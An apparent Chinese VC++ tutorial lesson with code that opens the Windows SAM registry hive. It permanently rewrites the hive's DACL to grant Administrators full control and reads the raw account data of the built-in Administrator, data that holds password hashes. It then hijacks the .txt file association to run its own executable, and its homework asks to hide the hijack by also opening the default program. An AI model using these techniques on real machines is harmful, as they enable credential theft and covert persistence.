vc++高级班之注册表篇[5]---提权打开SAM子键

时间:2022-09-04 22:37:02
①、普通方式打开 SAM 子键:
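// Open the SAM "Domains" subkey the ordinary way: the caller's own token,
// no DACL change. On a default install this open typically fails for any
// account (that is what the later DACL step on this page works around), so
// the failure path is now reported instead of silently doing nothing.
// Only read access is requested: the snippet opens the key and nothing else.
HKEY hKey = NULL;
// String literal -> must be a pointer to const in C++11 and later.
LPCTSTR lpszSubKey = _T("SAM\\SAM\\Domains");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_READ, &hKey);
if (lRet == ERROR_SUCCESS) {
    MessageBox(_T("打开成功!"));
    RegCloseKey(hKey);
    hKey = NULL;
} else {
    // RegOpenKeyEx returns the Win32 error code directly (it does not set
    // GetLastError), so show lRet itself.
    CString strMsg;
    strMsg.Format(_T("RegOpenKeyEx failed, error %ld"), lRet);
    MessageBox(strMsg);
}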
===================================================
②、提升权限(修改 SAM 项的 DACL):
#include <Aclapi.h>
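// Append one access-allowed ACE to the DACL of HKLM\SAM\SAM that gives the
// built-in Administrators group KEY_ALL_ACCESS, inherited by all subkeys and
// values (SUB_CONTAINERS_AND_OBJECTS_INHERIT).
//
// Reviewer notes:
//  - The change is persistent. Nothing in this function (or in its callers
//    on this page) restores the original DACL, so the whole SAM tree stays
//    fully writable by Administrators until someone reverts it by hand.
//  - SetNamedSecurityInfo needs WRITE_DAC on the key; presumably only an
//    elevated administrator token has that here -- confirm rather than
//    assume from the return value alone.
//  - NOTE(review): a DACL change on this key is a high-signal event; an
//    audit SACL on HKLM\SAM makes it visible in the Security event log.
//
// Returns TRUE on success, FALSE if any of the three Win32 calls fails.
// The failing call's error code is not propagated to the caller.
BOOL EnableRegSAMPriv()
{
    BOOL bRet = FALSE;
    PACL pOldDacl = NULL;
    PACL pNewDacl = NULL;
    // This is a security descriptor, not a SID (the original called it pSID).
    PSECURITY_DESCRIPTOR pSD = NULL;
    EXPLICIT_ACCESS eia = {0};
    // Object name in the form GetNamedSecurityInfo expects for SE_REGISTRY_KEY
    // ("MACHINE\" stands for HKEY_LOCAL_MACHINE). Arrays rather than TCHAR*
    // because these APIs take a non-const LPTSTR, and binding a string literal
    // to a non-const pointer is ill-formed in C++11 and later.
    TCHAR samName[] = _T("MACHINE\\SAM\\SAM");
    TCHAR groupName[] = _T("Administrators");

    // Fetch the current DACL. pOldDacl points INTO the descriptor returned in
    // pSD, so only pSD is freed below -- never LocalFree(pOldDacl).
    if (GetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                             NULL, NULL, &pOldDacl, NULL, &pSD) != ERROR_SUCCESS) {
        goto cleanup;
    }

    // Describe the ACE: full control for Administrators, inheritable.
    BuildExplicitAccessWithName(&eia, groupName, KEY_ALL_ACCESS, SET_ACCESS,
                                SUB_CONTAINERS_AND_OBJECTS_INHERIT);

    // Merge the ACE into a new DACL; the API allocates it with LocalAlloc.
    if (SetEntriesInAcl(1, &eia, pOldDacl, &pNewDacl) != ERROR_SUCCESS) {
        goto cleanup;
    }

    // Write the new DACL back to the key.
    if (SetNamedSecurityInfo(samName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
                             NULL, NULL, pNewDacl, NULL) != ERROR_SUCCESS) {
        goto cleanup;
    }

    bRet = TRUE;

cleanup:
    // LocalFree(NULL) is a no-op, so no NULL guards are needed.
    LocalFree(pNewDacl);
    LocalFree(pSD);
    return bRet;
}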
===================================================
③、读取数据:
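// Read the raw "V" value of one hard-coded account subkey under
// SAM\SAM\Domains\Account\Users. EnableRegSAMPriv() first adds the
// inheritable Administrators ACE to SAM\SAM (a persistent DACL change, see
// that function). The code below only reads, so it asks for KEY_READ instead
// of KEY_ALL_ACCESS -- least privilege, and the inherited ACE still satisfies it.
// The data is read into a buffer and discarded; its layout is not decoded here.
EnableRegSAMPriv();

HKEY hKey = NULL;
// String literal -> pointer to const.
LPCTSTR lpszSubKey = _T("SAM\\SAM\\Domains\\Account\\Users\\000001F4");
LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpszSubKey, 0, KEY_READ, &hKey);
if (lRet == ERROR_SUCCESS) {
    DWORD dwType = 0;
    DWORD dwDataLen = 0;
    // With a NULL buffer this call only reports the required size. The
    // original ignored its result and allocated anyway; check it so a missing
    // value is not treated as a zero-length read that "succeeded".
    lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, NULL, &dwDataLen);
    if (lRet == ERROR_SUCCESS && dwDataLen > 0) {
        // One spare byte kept from the original; harmless for binary data.
        BYTE *lpData = new BYTE[dwDataLen + 1];
        ZeroMemory(lpData, dwDataLen + 1);
        lRet = RegQueryValueEx(hKey, _T("V"), NULL, &dwType, lpData, &dwDataLen);
        // lRet may be ERROR_MORE_DATA if the value grew between the two calls;
        // a caller that needs the data must check lRet before using lpData.
        delete[] lpData;
    }
    RegCloseKey(hKey);
    hKey = NULL;
}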
===================================================
④、修改注册表实现文件类型关联:C:\WINDOWS\notepad.exe %1
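// Point the .txt "open" verb at this executable.
// Fixes versus the original:
//  - the command is quoted: an unquoted path with spaces (e.g. under
//    "Program Files") is split at the first space by the shell and can end up
//    launching a different program than intended;
//  - the REG_SZ byte count includes the terminating NUL, as RegSetValueEx
//    requires for string values;
//  - GetModuleFileName's result is checked (0 = failure, MAX_PATH = truncated);
//  - the key is opened with KEY_SET_VALUE only, which is all RegSetValueEx needs.
// NOTE(review): writes through HKEY_CLASSES_ROOT land in the machine-wide
// HKLM\Software\Classes unless a per-user override already exists -- confirm
// that scope is intended; it changes the association for every user and
// needs an elevated token.
HKEY hKey = NULL;
LPCTSTR lpszSubKey = _T("txtfile\\shell\\open\\command");
LONG lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, lpszSubKey, 0, KEY_SET_VALUE, &hKey);
if (lRet == ERROR_SUCCESS) {
    TCHAR szPath[MAX_PATH] = {0};
    DWORD cch = GetModuleFileName(NULL, szPath, MAX_PATH);
    // Refuse to register a partial or missing path.
    if (cch != 0 && cch < MAX_PATH) {
        CString strCmd;
        // "%%" is a literal percent sign in CString::Format.
        strCmd.Format(_T("\"%s\" \"%%1\""), szPath);
        // NULL value name = the key's default value; +1 covers the NUL.
        lRet = RegSetValueEx(hKey, NULL, 0, REG_SZ,
                             (const BYTE *)(LPCTSTR)strCmd,
                             (strCmd.GetLength() + 1) * sizeof(TCHAR));
    }
    RegCloseKey(hKey);
    hKey = NULL;
}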
===================================================
※※※ 小作业:
1、修改注册表实现文件关联后,不仅能打开本程序,还要打开默认关联的程序!
参考帖子:http://www.cctry.com/thread-4026-1-1.html